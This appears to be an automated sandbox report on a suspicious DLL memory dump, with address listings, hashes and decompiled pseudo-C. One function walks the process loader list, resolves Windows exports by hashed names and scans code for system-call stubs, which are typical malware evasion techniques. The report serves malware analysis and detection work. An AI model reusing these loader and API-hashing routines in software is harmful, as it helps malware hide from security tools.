0x6f5194e4
0x6f5194e7
0x6f5194e7
0x6f5194f3
0x6f5194fe
0x6f519504
0x6f519508
0x6f5194f5
0x6f5194f5
0x6f5194f5
0x6f519510
0x6f51953a
0x6f519540
0x6f519540
0x6f519548
0x6f5198f1
0x6f5198f7
0x6f5198fd
0x6f5198fd
0x00000000
0x6f51954e
0x6f51954e
0x6f519552
0x6f519555
0x6f519558
0x6f51955b
0x6f51955f
0x6f519561
0x6f519564
0x6f519567
0x6f51956b
0x6f519570
0x6f519573
0x6f519577
0x6f51957c
0x6f51957f
0x6f519581
0x6f519584
0x6f519588
0x6f51958d
0x6f51959d
0x6f5195a3
0x6f5195a3
0x6f5195ab
0x6f5195ad
0x6f5195b6
0x6f5195b8
0x6f5195bb
0x6f5195c6
0x6f5195f3
0x6f5195c8
0x6f5195df
0x6f5195df
0x6f5195fb
0x6f519601
0x6f519607
0x6f519607
0x6f5195fb
0x6f5195b6
0x6f51960e
0x6f51967f
0x6f519684
0x6f5196dd
0x6f51979f
0x6f5197a4
0x6f5197b3
0x6f5197b9
0x6f5197bd
0x6f5197c6
0x6f5197cd
0x6f5197d6
0x6f5197e4
0x6f5197e7
0x6f5197cf
0x6f5197cf
0x6f5197cf
0x6f5197cd
0x6f5197f0
0x6f51981d
0x6f519830
0x6f519838
0x6f51981f
0x6f519821
0x6f519829
0x6f519829
0x6f5197f2
0x6f5197f7
0x6f519816
0x6f5197f9
0x6f5197fe
0x6f51980f
0x6f519800
0x6f519800
0x6f519800
0x6f5197fe
0x6f5197f7
0x6f519840
0x6f51984f
0x6f51985c
0x6f519865
0x6f519869
0x6f51986d
0x6f519870
0x6f519873
0x6f519876
0x6f519879
0x6f51987c
0x6f519882
0x6f519886
0x6f51988c
0x6f51988c
0x6f519882
0x6f519892
0x6f5198cf
0x6f5198d3
0x6f5198da
0x6f5198e0
0x6f519894
0x6f519897
0x6f5198b7
0x6f5198bb
0x6f5198c2
0x6f5198c9
0x6f519899
0x6f51989c
0x6f51989e
0x6f5198a2
0x6f5198ac
0x6f5198b2
0x6f5198b2
0x6f51989c
0x6f519897
0x6f5198e7
0x6f5198e7
0x6f519900
0x6f519900
0x6f519906
0x6f51990b
0x6f519965
0x6f51996a
0x6f5199a9
0x6f5199ae
0x6f5199b0
0x6f5199b4
0x6f5199b7
0x6f5199ba
0x6f5199bc
0x6f5199bd
0x6f5199bd
0x6f5199c2
0x6f5199e0
0x6f5199e2
0x6f5199e6
0x6f5199ec
0x6f5199ef
0x6f5199f1
0x6f5199f2
0x6f5199f2
0x00000000
0x6f5199c4
0x6f5199c4
0x6f5199c4
0x6f5199c8
0x6f5199ce
0x6f5199d1
0x6f5199d3
0x6f5199d6
0x6f5199f5
0x6f5199f5
0x6f5199fc
0x6f519a16
0x6f5199fe
0x6f5199fe
0x6f519a0a
0x6f519a0b
0x6f519a0e
0x6f519a0e
0x6f519a24
0x6f519a24
0x6f5199c2
0x6f51996f
0x6f51997d
0x6f519995
0x6f519999
0x6f51999c
0x6f5199a2
0x6f5199a6
0x6f5199a6
0x00000000
0x6f5199a6
0x6f51997f
0x6f519983
0x6f519989
0x6f519989
0x6f51998f
0x00000000
0x6f51998f
0x6f519971
0x6f519975
0x00000000
0x6f519975
0x6f51990f
0x6f51993b
0x6f519953
0x6f519957
0x6f51995a
0x6f51995d
0x6f51995f
0x6f519962
0x6f51993d
0x6f51993d
0x6f519941
0x6f519944
0x6f519947
0x6f51994a
0x6f51994d
0x6f51994d
0x00000000
0x6f51993b
0x6f519915
0x00000000
0x00000000
0x6f51991b
0x6f51991f
0x6f519925
0x6f519928
0x6f51992b
0x6f51992e
0x00000000
0x6f51992e
0x6f5197a6
0x6f5197aa
0x6f5197b0
0x00000000
0x6f5197b0
0x6f5196e8
0x6f5196fa
0x6f5196ff
0x6f51976a
0x00000000
0x00000000
0x6f519771
0x6f519797
0x6f51979b
0x00000000
0x00000000
0x6f51977a
0x6f51977f
0x6f519793
0x00000000
0x00000000
0x00000000
0x6f519795
0x6f519786
0x00000000
0x00000000
0x6f51978b
0x00000000
0x00000000
0x6f51978d
0x00000000
0x6f519771
0x6f519701
0x6f51970b
0x6f51971c
0x6f51971f
0x6f519722
0x6f519728
0x00000000
0x00000000
0x00000000
0x00000000
0x6f51972e
0x6f51972e
0x6f51972e
0x6f519735
0x00000000
0x00000000
0x6f519737
0x6f51973a
0x6f519740
0x00000000
0x00000000
0x00000000
0x6f519742
0x6f519744
0x6f51974d
0x00000000
0x00000000
0x6f519761
0x00000000
0x00000000
0x00000000
0x6f519763
0x6f5196ef
0x00000000
0x00000000
0x00000000
0x6f5196f5
0x6f519689
0x6f5196b8
0x6f5196b9
0x6f5196c2
0x00000000
0x6f5196d3
0x00000000
0x6f5196d3
0x6f519690
0x6f519693
0x6f5196a6
0x6f5196a7
0x6f5196ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6f519693
0x6f519689
0x6f519615
0x6f519672
0x6f519676
0x6f51967c
0x00000000
0x6f51967c
0x6f519617
0x6f51961b
0x6f519628
0x6f51962c
0x6f519642
0x6f51964a
0x6f51962e
0x6f519630
0x6f51963a
0x6f51963a
0x6f519650
0x6f519659
0x6f519670
0x00000000
0x00000000
0x00000000
0x6f519670
0x6f51965b
0x6f51965b
0x00000000
0x6f519650

Strings

, xrefs: 6F5199DB

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 1f1cf33dbf916ef119a1b8be030eb5e68ef7c127462d2918c8173a786667430e
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 9D229D7140C3998BE714CF15C4913AABBE0BF86300F04897EE9E54B299D375BD89CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F51143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6F51143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6F510304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6f51d208 == 0 ||  *0x6f51d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6F514FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6f51d2f0 |  *0x6f51d2f1;
									if(( *0x6f51d2f0 |  *0x6f51d2f1) == 0) {
										_t525 =  *0x6f51d208; // 0x3141340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6f51d2f0 = 1;
											_t526 = E6F51361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6F511C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6f51d208 = _t526;
											 *0x6f51d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6F51361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6F511C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6F50DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6F50DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6f51d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6f51d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6F50E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6F51306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6f51d2e4 = 1;
					E6F50F584( &(_t535[0x38]), 0);
					E6F50F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6F50F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6F51306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6F50F828( &(_t535[0xc]), E6F50F4CC( &(_t535[8])) + 0x14);
								_t369 = E6F50F4BC( &(_t535[0xc]), E6F50F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6F50F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6F50F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6F50F654( &(_t535[8]));
							E6F50F654( &(_t535[0x164]));
							E6F50F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6F50F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6F511D34(0x60a28c5c);
							_t290 = E6F5112EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6F511C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6F50D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6F515CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6F515D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6F518E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6F50F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6F50BB44( &(_t535[0x110]));
							}
							E6F50CFDC( &(_t535[0x104]));
							E6F50CFDC(_t518);
							E6F50CFDC( &(_t535[0x15c]));
							E6F50CFDC( &(_t535[0x154]));
							E6F5190EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6F50F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6F5190B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6F50F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6F50F4CC( &(_t535[0x44]));
								_t519 =  *(0x6f51bd40 + _t381 * 4);
								_t531 = E6F51907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6F5187E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6F50F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6F50F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6F50F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6F50F828( &(_t535[0x20]), E6F50F4CC( &(_t535[0x1c])) + 8);
										E6F50F4BC( &(_t535[0x20]), E6F50F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6F51317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6F50F828( &(_t535[0x48]), _t535[0x70]);
									E6F51317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6F50F840( &(_t535[0x44]), _t563);
									E6F50F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6F51913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6F519104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6F50F654( &(_t535[0x144]));
									E6F50F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6f51d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6F50F654( &(_t535[0x11c]));
							E6F518E68(_t381,  &(_t535[0xd8]));
							E6F50F654( &(_t535[0x1c]));
							E6F50F654( &(_t535[0x44]));
							E6F50F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6F50F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6F50F828( &(_t535[0x38]), E6F50F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6F50F4BC( &(_t535[0x38]), E6F50F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6F50F4BC( &(_t535[0xc]), _t62);
						_t455 = E6F50F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6f511448
0x6f51144f
0x6f511452
0x6f511459
0x6f511bdb
0x6f511bdb
0x6f51145f
0x6f51146a
0x6f5119a9
0x6f5119ad
0x00000000
0x6f511c2c
0x6f5119b3
0x6f5119b6
0x6f5119b9
0x6f5119c3
0x6f5119d2
0x6f5119d4
0x6f5119db
0x6f511bc5
0x6f511bc7
0x6f511bca
0x6f511bce
0x00000000
0x6f511bce
0x6f5119ea
0x6f5119f5
0x6f5119fc
0x6f5119ff
0x6f511a01
0x6f511a04
0x6f511a07
0x6f511a0d
0x6f511a1b
0x6f511a2b
0x6f511a50
0x6f511a61
0x6f511a64
0x6f511a66
0x6f511aca
0x6f511acd
0x6f511acd
0x6f511acf
0x6f511ad2
0x6f511ad6
0x6f511ad6
0x6f511ada
0x00000000
0x00000000
0x6f511ae7
0x6f511aed
0x6f511b21
0x6f511b27
0x6f511b29
0x6f511bf8
0x6f511c00
0x6f511c03
0x6f511c05
0x6f511c1c
0x6f511c1c
0x6f511c07
0x6f511c0b
0x6f511c10
0x6f511c10
0x6f511c1e
0x6f511c24
0x6f511b43
0x6f511b43
0x6f511b45
0x6f511b45
0x6f511b47
0x6f511b47
0x6f511b4c
0x00000000
0x00000000
0x6f511b4e
0x6f511b4f
0x6f511b52
0x6f511b55
0x00000000
0x00000000
0x6f511b61
0x6f511b64
0x6f511b66
0x6f511b7d
0x6f511b7d
0x6f511b68
0x6f511b6c
0x6f511b71
0x6f511b71
0x6f511b8a
0x6f511b8d
0x6f511b96
0x6f511b99
0x6f511bbc
0x6f511bc0
0x00000000
0x6f511bc0
0x6f511ba1
0x6f511ba1
0x6f511bad
0x6f511bb0
0x6f511bb9
0x00000000
0x6f511bb9
0x6f511b2f
0x6f511b3f
0x6f511b3f
0x6f511b41
0x00000000
0x00000000
0x6f511b37
0x6f511b39
0x6f511b39
0x00000000
0x6f511b3f
0x6f511aef
0x6f511af7
0x6f511b17
0x6f511af9
0x6f511af9
0x6f511b01
0x6f511b0a
0x6f511b0a
0x6f511b01
0x00000000
0x6f511af7
0x6f511a68
0x6f511a6f
0x00000000
0x00000000
0x6f511a7c
0x6f511a82
0x6f511a87
0x6f511a8e
0x6f511a92
0x6f511aa7
0x6f511aa9
0x6f511aab
0x6f511ab1
0x6f511abf
0x6f511abf
0x6f511ac5
0x00000000
0x6f511ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6f511a0f
0x6f511a0f
0x6f511a0f
0x6f511a10
0x6f511a13
0x6f511a17
0x00000000
0x6f511a2d
0x6f511a30
0x6f511a33
0x6f511a3c
0x6f511a3f
0x6f511a40
0x6f511a42
0x00000000
0x6f51147d
0x6f51147f
0x6f511484
0x6f51148f
0x6f51149d
0x6f5114b0
0x6f5114bd
0x6f5114c6
0x6f5114ca
0x6f5114ce
0x6f511516
0x6f511516
0x6f511518
0x6f51151f
0x00000000
0x00000000
0x6f511538
0x6f511540
0x6f511544
0x6f511559
0x6f51155d
0x6f511561
0x6f51156a
0x6f511570
0x6f511573
0x6f511577
0x6f51157f
0x6f511581
0x6f511585
0x6f51158c
0x6f511595
0x6f511595
0x6f511599
0x6f5115ae
0x6f5115c4
0x6f5115d1
0x6f5115d2
0x6f5115d2
0x6f5115d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6f51158e
0x6f51158e
0x6f51158e
0x6f51158f
0x6f511590
0x00000000
0x6f51158e
0x6f511553
0x6f511557
0x00000000
0x00000000
0x00000000
0x6f5115d8
0x6f5115d8
0x6f5115d9
0x6f5115dc
0x6f5115e6
0x6f5115e6
0x6f5115ea
0x6f5115f1
0x6f51164c
0x6f511651
0x6f5116a4
0x6f5116a4
0x6f5116a8
0x6f5116ac
0x6f5114d6
0x6f5114d9
0x6f5114de
0x6f5114e4
0x6f5114e7
0x6f5114ee
0x6f5114f2
0x6f5114f9
0x6f511502
0x6f511506
0x6f51150a
0x6f511510
0x00000000
0x00000000
0x00000000
0x6f511510
0x6f5116b6
0x6f5116c2
0x6f5116cd
0x6f5116d4
0x6f5116dd
0x6f5116e7
0x6f5116e8
0x6f5116f6
0x6f5116fb
0x6f5116fc
0x6f511709
0x6f51170e
0x6f511720
0x6f511725
0x6f51172a
0x6f51173c
0x6f51174e
0x6f511753
0x6f51175e
0x6f511765
0x6f51176a
0x6f511772
0x6f51177b
0x6f51177b
0x6f511787
0x6f51178e
0x6f51179a
0x6f5117a6
0x6f5117b4
0x6f5117c5
0x6f5117cc
0x6f5117d1
0x6f5117da
0x6f5117df
0x6f5117e1
0x6f5117e5
0x6f5117e9
0x6f5117f6
0x6f511803
0x6f511807
0x6f51181b
0x6f51181f
0x00000000
0x00000000
0x6f511834
0x6f511836
0x6f51183e
0x6f51183b
0x6f51183b
0x6f51183b
0x6f511842
0x6f511844
0x6f51184a
0x6f511850
0x6f5118ac
0x6f5118b5
0x6f5118b9
0x6f5118c6
0x6f5118cf
0x6f5118d4
0x6f5118d8
0x6f5118db
0x6f51193c
0x6f511952
0x6f51195d
0x6f51195e
0x6f51195f
0x6f511963
0x6f511966
0x6f511be6
0x6f511be9
0x6f511be9
0x00000000
0x6f511966
0x6f5118e5
0x6f5118f5
0x6f5118fe
0x6f511907
0x6f511910
0x6f511911
0x6f511912
0x6f511917
0x6f51191f
0x6f511927
0x00000000
0x00000000
0x00000000
0x6f511929
0x6f511859
0x6f51185e
0x6f511862
0x6f511862
0x6f511866
0x6f511869
0x00000000
0x00000000
0x6f51188a
0x6f51188c
0x6f511890
0x6f511892
0x00000000
0x00000000
0x6f511894
0x6f51189b
0x6f5118a7
0x00000000
0x6f5118a7
0x6f51186e
0x00000000
0x6f51196c
0x6f51196c
0x6f51196d
0x6f51197d
0x6f511989
0x6f511992
0x6f51199b
0x6f5119a4
0x00000000
0x6f5119a4
0x6f511653
0x6f511655
0x6f511657
0x6f51165c
0x6f511661
0x6f511674
0x6f51168a
0x6f511693
0x6f511694
0x6f511694
0x6f511696
0x6f511697
0x6f51169a
0x6f51169e
0x00000000
0x6f511657
0x6f5115f3
0x6f5115fd
0x6f5115fe
0x6f5115fe
0x6f51160b
0x6f511617
0x6f511619
0x6f51161b
0x6f51161f
0x6f51162f
0x6f51162f
0x6f511636
0x6f511639
0x6f51163a
0x6f51163e
0x6f511648
0x00000000
0x6f511648

Memory Dump Source

Source File: 00000001.00000002.738911371.000000006F501000.00000020.00020000.sdmp, Offset: 6F500000, based on PE: true

Associated: 00000001.00000002.738884438.000000006F500000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739011384.000000006F51A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.739077298.000000006F51D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.739123881.000000006F51F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e17494cb555c3a3663db2a63acaef6854a32de50d047c425b70dba616cee9f2
Instruction ID: 302124f98b68f719995e8ae43d4a841e9722293742386e739208be0f4b1e1a84
Opcode Fuzzy Hash: 3e17494cb555c3a3663db2a63acaef6854a32de50d047c425b70dba616cee9f2
Instruction Fuzzy Hash: B0325B705083458FE714EF24C890A9AB7E5FFE5308F10897DE5958B2A1EB70ED45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6F506D0C, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F506D0C() {

				 *0x6f51d280 = GetUserNameW;
				 *0x6F51D284 = MessageBoxW;
				 *0x6F51D288 = GetLastError;
				 *0x6F51D28C = CreateFileA;
				 *0x6F51D290 = DebugBreak;
				 *0x6F51D294 = FlushFileBuffers;
				 *0x6F51D298 = FreeEnvironmentStringsA;
				 *0x6F51D29C = GetConsoleOutputCP;
				 *0x6F51D2A0 = GetEnvironmentStrings;
				 *0x6F51D2A4 = GetLocaleInfoA;
				 *0x6F51D2A8 = GetStartupInfoA;
				 *0x6F51D2AC = GetStringTypeA;
				 *0x6F51D2B0 = HeapValidate;
				 *0x6F51D2B4 = IsBadReadPtr;
				 *0x6F51D2B8 = LCMapStringA;
				 *0x6F51D2BC = LoadLibraryA;
				 *0x6F51D2C0 = OutputDebugStringA;
				return 0x6f51d280;
			}

0x6f506d1d
0x6f506d25
0x6f506d28
0x6f506d37
0x6f506d3a
0x6f506d49
0x6f506d4c
0x6f506d5b
0x6f506d5e
0x6f506d6d
0x6f506d70
0x6f506d7f
0x6f506d82
0x6f506d91
0x6f506d94
